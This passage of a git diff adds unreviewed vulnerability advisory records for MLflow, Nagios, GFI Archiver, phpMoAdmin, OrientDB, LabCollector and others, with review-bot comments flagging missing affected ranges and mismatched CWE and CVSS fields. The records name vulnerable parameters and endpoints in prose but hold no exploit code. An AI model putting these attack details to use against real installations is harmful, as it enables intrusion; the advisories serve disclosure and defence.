+ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2492"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/tensorflow/tensorflow/commit/46e7f7fb144fd11cf6d17c23dd47620328d77082"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-116"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-427"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-c478-8rj5-w9cv/GHSA-c478-8rj5-w9cv.json b/advisories/unreviewed/2026/02/GHSA-c478-8rj5-w9cv/GHSA-c478-8rj5-w9cv.json
new file mode 100644
index 0000000000000..9ef1ff0afc53f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-c478-8rj5-w9cv/GHSA-c478-8rj5-w9cv.json
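Review bot: In the GHSA-9xmv-j327-gw5g record `affected` is an empty array even though `references` names a fix commit in `github.com/tensorflow/tensorflow`, so tooling that matches advisories by package and version range has nothing to match on and will not flag installations. If the PyPI distribution is what is affected, the record would carry an entry of the form `{"package": {"ecosystem": "PyPI", "name": "tensorflow"}, "ranges": [...]}`, with the fixed version taken from the release that contains that commit (this page does not show it). The MLflow record GHSA-gq3w-7jj3-x7gr later in this sync has the same gap, with a `CRITICAL` severity and a fix reference in `github.com/mlflow/mlflow`.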
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c478-8rj5-w9cv",
+ "modified": "2026-02-21T00:31:42Z",
+ "published": "2026-02-21T00:31:42Z",
+ "aliases": [
+ "CVE-2019-25435"
+ ],
+ "details": "Sricam DeviceViewer 3.12.0.1 contains a local buffer overflow vulnerability in the user management add user function that allows authenticated attackers to execute arbitrary code by bypassing data execution prevention. Attackers can inject a malicious payload through the Username field in User Management to trigger a stack-based buffer overflow and execute commands via ROP chain gadgets.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25435"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/47477"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.sricam.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/sricam-deviceviewer-local-buffer-overflow-dep-bypass"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fhrj-59h8-j7gf/GHSA-fhrj-59h8-j7gf.json b/advisories/unreviewed/2026/02/GHSA-fhrj-59h8-j7gf/GHSA-fhrj-59h8-j7gf.json
new file mode 100644
index 0000000000000..4aaa80cfdffc8
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fhrj-59h8-j7gf/GHSA-fhrj-59h8-j7gf.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fhrj-59h8-j7gf",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:43Z",
+ "aliases": [
+ "CVE-2019-25451"
+ ],
+ "details": "phpMoAdmin 1.1.5 contains a cross-site request forgery vulnerability that allows attackers to perform unauthorized database operations by crafting malicious requests. Attackers can trick authenticated users into submitting GET requests to moadmin.php with parameters like action, db, and collection to create, drop, or repair databases and collections without user consent.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25451"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/46082"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/phpmoadmin-cross-site-request-forgery-via-moadminphp"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.phpmoadmin.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fjxv-44q5-26f4/GHSA-fjxv-44q5-26f4.json b/advisories/unreviewed/2026/02/GHSA-fjxv-44q5-26f4/GHSA-fjxv-44q5-26f4.json
new file mode 100644
index 0000000000000..c8abd181e363b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fjxv-44q5-26f4/GHSA-fjxv-44q5-26f4.json
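Review bot: In the GHSA-fhrj-59h8-j7gf record `cwe_ids` lists `CWE-918` (server-side request forgery), but `details` and the VulnCheck reference slug both describe cross-site request forgery, which is `CWE-352`; the OrientDB CSRF record GHSA-65c4-vf29-7265 in this same sync uses `CWE-352`. I would change the entry to `"CWE-352"` so that CWE-based filtering and triage rules classify it correctly. The `CVSS_V3` vector also carries `UI:N` although `details` says the attacker has to trick an authenticated user into sending the request, so `UI:R` looks closer to the described behaviour.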
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fjxv-44q5-26f4",
+ "modified": "2026-02-21T00:31:43Z",
+ "published": "2026-02-21T00:31:43Z",
+ "aliases": [
+ "CVE-2019-25448"
+ ],
+ "details": "OrientDB 3.0.17 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by creating users with script payloads in the name parameter. Attackers can send POST requests to the document endpoint with JavaScript code in the name field to execute arbitrary scripts when users view the application.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25448"
+ },
+ {
+ "type": "WEB",
+ "url": "https://orientdb.dev"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/46517"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/orientdb-stored-cross-site-scripting-via-user-creation"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-gq3w-7jj3-x7gr/GHSA-gq3w-7jj3-x7gr.json b/advisories/unreviewed/2026/02/GHSA-gq3w-7jj3-x7gr/GHSA-gq3w-7jj3-x7gr.json
new file mode 100644
index 0000000000000..098a8df9b049e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-gq3w-7jj3-x7gr/GHSA-gq3w-7jj3-x7gr.json
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gq3w-7jj3-x7gr", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2635" + ], + "details": "MLflow Use of Default Password Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of MLflow. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the basic_auth.ini file. The file contains hard-coded default credentials. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of the administrator. Was ZDI-CAN-28256.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2635" + }, + { + "type": "WEB", + "url": "https://github.com/mlflow/mlflow/pull/19260" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-111" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1393" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hc96-x3gj-mp7g/GHSA-hc96-x3gj-mp7g.json b/advisories/unreviewed/2026/02/GHSA-hc96-x3gj-mp7g/GHSA-hc96-x3gj-mp7g.json new file mode 100644 index 0000000000000..458ae6f3a31ab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hc96-x3gj-mp7g/GHSA-hc96-x3gj-mp7g.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hc96-x3gj-mp7g", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2019-25453" + ], + "details": "phpMoAdmin 1.1.5 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the newdb parameter. Attackers can craft URLs with JavaScript payloads in the newdb parameter of moadmin.php to execute arbitrary code in users' browsers when they visit the malicious link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25453" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46082" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/phpmoadmin-reflected-cross-site-scripting-via-moadminphp" + }, + { + "type": "WEB", + "url": "http://www.phpmoadmin.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2r8-vmq7-fpx2/GHSA-q2r8-vmq7-fpx2.json b/advisories/unreviewed/2026/02/GHSA-q2r8-vmq7-fpx2/GHSA-q2r8-vmq7-fpx2.json new file mode 100644 index 0000000000000..1c909829d0a77 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2r8-vmq7-fpx2/GHSA-q2r8-vmq7-fpx2.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2r8-vmq7-fpx2", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2033" + ], + "details": "MLflow Tracking Server Artifact Handler Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MLflow Tracking Server. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of artifact file paths. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26649.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2033" + }, + { + "type": "WEB", + "url": "https://github.com/mlflow/mlflow/pull/19260" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-105" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q2wq-f7jq-885v/GHSA-q2wq-f7jq-885v.json b/advisories/unreviewed/2026/02/GHSA-q2wq-f7jq-885v/GHSA-q2wq-f7jq-885v.json new file mode 100644 index 0000000000000..8f640c2bf8511 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q2wq-f7jq-885v/GHSA-q2wq-f7jq-885v.json 
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-q2wq-f7jq-885v",
+ "modified": "2026-02-21T00:31:42Z",
+ "published": "2026-02-21T00:31:42Z",
+ "aliases": [
+ "CVE-2019-25436"
+ ],
+ "details": "Sricam DeviceViewer 3.12.0.1 contains a password change security bypass vulnerability that allows authenticated users to change passwords without proper validation of the old password field. Attackers can inject a large payload into the old password parameter during the change password process to bypass validation and set an arbitrary new password.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25436"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/47476"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/sricam-deviceviewer-password-change-security-bypass"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.sricam.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-303"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T23:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-q77w-wghg-55fv/GHSA-q77w-wghg-55fv.json b/advisories/unreviewed/2026/02/GHSA-q77w-wghg-55fv/GHSA-q77w-wghg-55fv.json
new file mode 100644
index 0000000000000..524af1475ea00
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-q77w-wghg-55fv/GHSA-q77w-wghg-55fv.json
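Review bot: The two severity vectors in GHSA-q2wq-f7jq-885v disagree on the attack surface: the `CVSS_V3` entry scores `AV:N` and `UI:N`, while the `CVSS_V4` entry scores `AV:L` and `UI:A`. Both describe the same flaw, so one of them is presumably wrong, and tooling that prefers one CVSS version over the other will rank this advisory differently. The `details` text does not say whether the password-change path is reachable over the network, so the record should be checked against the upstream CVE entry rather than corrected by guesswork.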
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q77w-wghg-55fv", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2043" + ], + "details": "Nagios Host esensors_websensor_configwizard_func Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Nagios Host. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the esensors_websensor_configwizard_func method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28249.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2043" + }, + { + "type": "WEB", + "url": "https://www.nagios.com/changelog/nagios-xi/nagios-xi-2026r1-0-1" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-072" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q8fp-vccx-9w2h/GHSA-q8fp-vccx-9w2h.json b/advisories/unreviewed/2026/02/GHSA-q8fp-vccx-9w2h/GHSA-q8fp-vccx-9w2h.json new file mode 100644 index 0000000000000..fb41a34cbaba9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q8fp-vccx-9w2h/GHSA-q8fp-vccx-9w2h.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8fp-vccx-9w2h", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2039" + ], + "details": "GFI Archiver MArc.Store Missing Authorization Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of GFI Archiver. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of the MArc.Store.Remoting.exe process, which listens on port 8018. The issue results from the lack of authorization prior to allowing access to functionality. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of SYSTEM. Was ZDI-CAN-28597.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2039" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-077" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qp8f-9474-hr27/GHSA-qp8f-9474-hr27.json b/advisories/unreviewed/2026/02/GHSA-qp8f-9474-hr27/GHSA-qp8f-9474-hr27.json new file mode 100644 index 0000000000000..45941c2bed175 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qp8f-9474-hr27/GHSA-qp8f-9474-hr27.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qp8f-9474-hr27", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2041" + ], + "details": "Nagios Host zabbixagent_configwizard_func Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Nagios Host. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the zabbixagent_configwizard_func method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28250.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2041" + }, + { + "type": "WEB", + "url": "https://www.nagios.com/changelog/nagios-xi/nagios-xi-2026r1-0-1" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-073" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qqfx-94p8-6p39/GHSA-qqfx-94p8-6p39.json b/advisories/unreviewed/2026/02/GHSA-qqfx-94p8-6p39/GHSA-qqfx-94p8-6p39.json new file mode 100644 index 0000000000000..dd93f8cee5a75 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqfx-94p8-6p39/GHSA-qqfx-94p8-6p39.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqfx-94p8-6p39", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25438" + ], + "details": "LabCollector 5.423 contains multiple SQL injection vulnerabilities that allow unauthenticated attackers to execute arbitrary SQL commands by injecting malicious code through POST parameters. Attackers can submit crafted SQL payloads in the login parameter of login.php or the user_name parameter of retrieve_password.php to extract sensitive database information without authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25438" + }, + { + "type": "WEB", + "url": "https://labcollector.com" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47460" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/labcollector-sql-injection-via-loginphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r872-6r9v-fwgg/GHSA-r872-6r9v-fwgg.json b/advisories/unreviewed/2026/02/GHSA-r872-6r9v-fwgg/GHSA-r872-6r9v-fwgg.json new file mode 100644 index 0000000000000..72fb404453dbc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r872-6r9v-fwgg/GHSA-r872-6r9v-fwgg.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r872-6r9v-fwgg", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25441" + ], + "details": "thesystem 1.0 contains a command injection vulnerability that allows unauthenticated attackers to execute arbitrary system commands by submitting malicious input to the run_command endpoint. Attackers can send POST requests with shell commands in the command parameter to execute arbitrary code on the server without authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25441" + }, + { + "type": "WEB", + "url": "https://github.com/kostasmitroglou/thesystem" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47441" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/thesystem-command-injection-via-runcommand-endpoint" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rc45-jprg-5pmq/GHSA-rc45-jprg-5pmq.json b/advisories/unreviewed/2026/02/GHSA-rc45-jprg-5pmq/GHSA-rc45-jprg-5pmq.json new file mode 100644 index 0000000000000..d27a55f54169b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rc45-jprg-5pmq/GHSA-rc45-jprg-5pmq.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rc45-jprg-5pmq", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2038" + ], + "details": "GFI Archiver MArc.Core Missing Authorization Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of GFI Archiver. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of the MArc.Core.Remoting.exe process, which listens on port 8017. The issue results from the lack of authorization prior to allowing access to functionality. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of SYSTEM. Was ZDI-CAN-27934.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2038" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-075" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rwr9-9r33-h7x4/GHSA-rwr9-9r33-h7x4.json b/advisories/unreviewed/2026/02/GHSA-rwr9-9r33-h7x4/GHSA-rwr9-9r33-h7x4.json new file mode 100644 index 0000000000000..2160c1b380f06 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rwr9-9r33-h7x4/GHSA-rwr9-9r33-h7x4.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwr9-9r33-h7x4", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2042" + ], + "details": "Nagios Host monitoringwizard Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Nagios Host. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the monitoringwizard module. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28245.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2042" + }, + { + "type": "WEB", + "url": "https://www.nagios.com/changelog/nagios-xi/nagios-xi-2026r1-0-1" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-071" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vm4c-6g35-79xf/GHSA-vm4c-6g35-79xf.json b/advisories/unreviewed/2026/02/GHSA-vm4c-6g35-79xf/GHSA-vm4c-6g35-79xf.json new file mode 100644 index 0000000000000..da10ca32f5bb8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vm4c-6g35-79xf/GHSA-vm4c-6g35-79xf.json 
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vm4c-6g35-79xf",
+ "modified": "2026-02-21T00:31:42Z",
+ "published": "2026-02-21T00:31:42Z",
+ "aliases": [
+ "CVE-2026-2858"
+ ],
